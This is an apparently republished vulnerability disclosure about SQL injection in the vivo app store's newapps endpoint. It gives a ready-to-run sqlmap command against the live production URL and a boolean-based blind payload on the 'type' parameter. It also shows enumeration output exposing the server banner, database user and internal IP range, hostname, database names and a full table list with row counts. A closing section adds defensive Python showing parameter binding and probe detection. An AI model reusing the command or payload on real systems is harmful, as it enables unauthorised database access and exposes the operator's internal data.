神刀安全网

Vulnerability title: SQL injection in the vivo app store

Vulnerability details

Disclosure status:

2016-04-01: Details reported to the vendor; awaiting the vendor's handling
2016-04-06: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

As in the title.

Detailed description:

Code area
python sqlmap.py -u "http://main.appstore.vivo.com.cn/rec/newapps?nt=WIFI&u=-57806365&model=vivo+Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=2&av=19&cs=0&s=2%7C3511262971"

Code area
Parameter: type (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: nt=WIFI&u=-57806365&model=vivo Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=(SELECT (CASE WHEN (9154=9154) THEN 9154 ELSE 9154*(SELECT 9154 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&av=19&cs=0&s=2|3511262971
---
back-end DBMS: MySQL 5.0
banner: '5.5.39-log'
current user: 'myappstore_r@10.13.13.%'
current database: 'appstore'
hostname: 'bj_appdb02'
current user is DBA: False
database management system users [1]:
[*] 'myappstore_r'@'10.13.13.%'

database management system users privileges:
[*] %myappstore_r% [1]:
privilege: USAGE

database management system users roles:
[*] %myappstore_r% [1]:
role: USAGE

available databases [3]:
[*] appstore
[*] information_schema
[*] test

Proof of vulnerability:

Code area
Database: appstore
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| t_app_comment | 8381086 |
| t_app_baidu | 5399705 |
| t_app_screenshot_history | 5244691 |
| t_app_download_log_20141104 | 5163862 |
| t_app_download_complete_log_20141107 | 4758294 |
| t_browse_app_log_20141107 | 3713899 |
| t_app_download_complete_log_20141104 | 3474746 |
| t_browse_app_log_20141104 | 2880982 |
| t_app_comment_20150321_bak | 1300759 |
| t_app_pc_download_log | 1148008 |
| t_push_log_20141107 | 1072361 |
| t_checkmd5fail_log | 644221 |
| t_testin_passed_overview | 549221 |
| t_search_word_log_20141107 | 452975 |
| t_app_screenshot | 348472 |
| t_search_word_log_20141104 | 337439 |
| t_testin_safe_report | 329668 |
| t_ac_app_screenshot | 324204 |
| t_search_word_log_20150202 | 320806 |
| t_app_relate_recommend | 303661 |
| t_rank_setup | 260106 |
| t_app_filter | 130289 |
| t_testin_overview | 103093 |
| t_testin_safe_report_back | 87557 |
| t_comment_forbid_reason | 84861 |
| t_testin_back | 82375 |
| t_app_info | 77037 |
| t_ac_app_info | 76660 |
| t_app_tags | 70172 |
| t_app_download_count_201603 | 65873 |
| t_app_download_stat | 65873 |
| t_app_download_month_rank | 65872 |
| t_app_download_count_201601 | 64731 |
| t_app_download_count_201602 | 64343 |
| t_app_download_count_201511 | 63951 |
| t_app_download_count_201512 | 63753 |
| t_app_download_count_201510 | 57766 |
| t_app_download_count_201509 | 56187 |
| t_app_download_count_201508 | 55218 |
| t_app_download_count_201507 | 53310 |
| t_app_download_count_201506 | 50191 |
| t_app_download_count_201505 | 49740 |
| t_app_download_count_201504 | 49207 |
| t_testin | 48941 |
| t_app_download_count_201503 | 47113 |
| t_user_operation | 43929 |
| t_award_info | 35707 |
| t_app_download_count_201502 | 34512 |
| t_apk_delete | 33559 |
| t_app_download_count_201501 | 33179 |
| t_rank_risk | 33111 |
| t_comment_grade | 32560 |
| t_testin_failed_overview | 31168 |
| t_app_download_count_201412 | 28467 |
| t_ac_wdj_icon | 27544 |
| t_app_download_count_201411 | 24203 |
| t_testin_overview_back | 23695 |
| t_type_app | 22178 |
| t_type_game | 21813 |
| t_type_rank_setup | 19412 |
| t_comment_grade_20150321_bak | 17779 |
| t_push_log_20150202 | 15249 |
| t_console_adminlog | 10145 |
| t_focus_rank_setup | 9804 |
| t_type_recommend_rank_bspread | 9787 |
| t_hub_set | 7050 |
| t_android_permission | 6847 |
| t_baidu_app_comment | 6586 |
| t_rank_idx_rec_ab | 6400 |
| t_app_type_info | 5443 |
| t_testin_noexecute_overview | 5200 |
| t_ad_app | 4845 |
| t_ad_icon | 4650 |
| t_app_baidu_type | 4532 |
| t_ip_area_config | 4449 |
| t_search_word_rank | 3900 |
| t_relation_tags | 2695 |
| t_baidu_app_screenshot | 2158 |
| t_comment_forbid | 2073 |
| t_excel_rank_app | 1999 |
| t_excel_rank_popup_word | 1940 |
| t_app_info_delete | 1828 |
| t_baidu_app_info_delete | 1397 |
| t_business_game | 1346 |
| t_ad_info | 1311 |
| t_model_topic | 1082 |
| t_rank_popular_daily | 1000 |
| t_popupword_rank_setup | 984 |
| t_template_app | 862 |
| t_app_screenshot_img | 789 |
| t_hot_word | 780 |
| t_top_sync | 750 |
| t_tags | 745 |
| t_topic_icon | 732 |
| t_censor_word | 720 |
| t_baidu_app_info | 709 |
| t_app_package_double | 628 |
| t_excel_rank_hot_word | 596 |
| t_browse_app_log_20150202 | 531 |
| t_topic_module_app | 474 |
| t_activity_info | 433 |
| t_push_log_20151205 | 425 |
| t_excel_rank_type_app | 401 |
| t_type_recommend_rank | 400 |
| t_charge_sign | 376 |
| t_excellent_app_log | 352 |
| t_cellphone_recommend_bak | 320 |
| t_ac_app_info_all | 319 |
| t_packages_update_log_20141107 | 316 |
| t_tmp_package | 312 |
| t_topic_info | 282 |
| t_packages_update_log_20141104 | 272 |
| t_charge_sign_bak | 248 |
| t_search_word_relation | 227 |
| t_app_download_month_top | 220 |
| t_app_onsale_date_top | 220 |
| t_rank_application | 220 |
| t_rank_console_game | 220 |
| t_rank_game | 220 |
| t_rank_hot | 220 |
| t_rank_new | 220 |
| t_rank_online_game | 220 |
| t_rank_popular | 220 |
| t_top_application | 220 |
| t_top_console_game | 220 |
| t_top_game | 220 |
| t_top_online_game | 220 |
| t_top_risk | 220 |
| t_rank_risk_order | 217 |
| t_activity_app | 201 |
| t_rank_hot_bak | 200 |
| t_rank_new_bak | 200 |
| t_model_activity | 196 |
| t_console_adminmenu | 175 |
| t_hotword_autosched | 175 |
| t_search_word_top | 174 |
| t_system_package_tmp | 166 |
| t_model_info_sub | 161 |
| t_ac_app_info_hot | 159 |
| t_app_install_log | 155 |
| t_index_model_apps | 130 |
| t_top_girls_app | 128 |
| t_top_boys_app | 126 |
| t_model_info | 121 |
| t_rank_place | 120 |
| t_recommend_common_setup | 119 |
| t_app_history_info | 117 |
| t_testin_risked_overview | 116 |
| t_app_type_second | 108 |
| t_ac_spider_list_task | 107 |
| t_ac_spider_list_template | 107 |
| t_push_log_20151209 | 105 |
| t_app_recommend | 100 |
| t_game_recommend | 100 |
| t_search_hot_word | 100 |
| t_search_hot_word_bak | 99 |
| t_cellphone_recommend | 98 |
| t_console_adminmenu_bak | 93 |
| t_type_rank | 93 |
| t_console_constant | 73 |
| t_start_page | 68 |
| t_focus_setting | 64 |
| t_app_hui | 61 |
| t_topic_module_item | 46 |
| t_console_h5resource | 44 |
| t_system_package | 42 |
| t_developer_app_type | 37 |
| t_topic_module | 32 |
| t_focus_picture | 29 |
| t_app_type_bak | 27 |
| t_type_icon_bak | 27 |
| t_app_type | 26 |
| t_editor_recommend | 26 |
| t_type_icon | 26 |
| t_admin_user_security | 24 |
| t_search_app | 24 |
| t_tmp_package2 | 24 |
| `t_console_adminuser-20141229-bak` | 22 |
| t_baidu_type | 21 |
| t_type_personal | 21 |
| t_type_mapping | 20 |
| t_template_apptype | 19 |
| t_app_list | 18 |
| t_push_log_20141104 | 16 |
| t_index_model_subtitle | 15 |
| t_db_version | 14 |
| t_hub_content | 14 |
| t_rank_hot_unsupport | 14 |
| t_update_system_package | 14 |
| t_hub_info | 12 |
| t_model_ad | 10 |
| t_operation_constant | 10 |
| t_word_popup | 10 |
| t_push_log_20151206 | 6 |
| t_series_info | 6 |
| t_app_replace | 5 |
| t_entry_info | 5 |
| t_template_resource | 5 |
| t_activity_tag | 4 |
| t_push_activity | 4 |
| t_top_wrapper | 4 |
| t_top_wrapper_cache | 4 |
| t_ac_spider_detail_template | 3 |
| t_activity_set_img | 3 |
| t_app_replace_history | 3 |
| t_ac_single_download | 2 |
| t_focus_grid | 2 |
| t_moble_error | 2 |
| t_moble_error_baidu | 2 |
| t_search_black_list | 2 |
| t_top_relation | 2 |
| t_activity_set | 1 |
| t_app_baidu_install_log | 1 |
| t_app_type_new | 1 |
| t_hotapp_info | 1 |
| t_index_model | 1 |
| t_recommend_common | 1 |
| t_review_records | 1 |
+--------------------------------------+---------+

Remediation:
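The report leaves the remediation section empty. As an added illustration (not the report's or the vendor's code), the following Python contrasts a hypothetical handler that concatenates the `type` parameter into its query, which lets the boolean-based blind probe sqlmap reported pass straight into the statement, with one that whitelists `type` as an integer and binds it as a query parameter; it assumes `type` is an integer selector (the original request uses `type=2`), uses SQLite as a stand-in for the MySQL backend, and the `t_app_info` rows and columns are constructed.

```python
import re
import sqlite3  # stand-in for the MySQL backend; parameter binding works the same with PyMySQL
from urllib.parse import parse_qs, urlsplit

# Constructed request paths modelled on /rec/newapps; PROBE carries the boolean-based blind payload.
BENIGN = "/rec/newapps?nt=WIFI&app_version=622&type=2&av=19"
PROBE = ("/rec/newapps?nt=WIFI&app_version=622&type=(SELECT (CASE WHEN (9154=9154) "
         "THEN 9154 ELSE 9154*(SELECT 9154 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&av=19")

def request_type(path: str) -> str:
    """Pull the raw `type` query-string value out of a request path."""
    return parse_qs(urlsplit(path).query).get("type", [""])[0]

def vulnerable_sql(raw_type: str) -> str:
    """Hypothetical 'before': the parameter is concatenated into the statement,
    so whatever the client sends becomes part of the SQL the server runs."""
    return "SELECT id, name FROM t_app_info WHERE type = " + raw_type

def parse_type(raw_type: str) -> int:
    """Whitelist validation (assumed semantics): `type` is a small integer selector."""
    if not re.fullmatch(r"\d{1,3}", raw_type):
        raise ValueError("type must be a 1-3 digit integer")
    return int(raw_type)

def make_db() -> sqlite3.Connection:
    """In-memory table with constructed rows standing in for appstore.t_app_info."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_app_info (id INTEGER, name TEXT, type INTEGER)")
    conn.executemany("INSERT INTO t_app_info VALUES (?, ?, ?)",
                     [(1, "app-a", 2), (2, "app-b", 2), (3, "game-c", 3)])
    return conn

def safe_lookup(conn: sqlite3.Connection, raw_type: str) -> list:
    """Hardened 'after': the validated value is bound as a parameter and can never alter the SQL."""
    return conn.execute("SELECT id, name FROM t_app_info WHERE type = ?",
                        (parse_type(raw_type),)).fetchall()

def is_probe(path: str) -> bool:
    """Access-log check: any request whose `type` fails the whitelist is an injection attempt."""
    try:
        parse_type(request_type(path))
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    print(vulnerable_sql(request_type(PROBE)))          # the CASE WHEN subquery lands inside the statement
    print(safe_lookup(make_db(), request_type(BENIGN))) # [(1, 'app-a'), (2, 'app-b')]
    print(is_probe(PROBE), is_probe(BENIGN))            # True False
```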

Copyright notice: when reposting, please credit the source: sauce@乌云
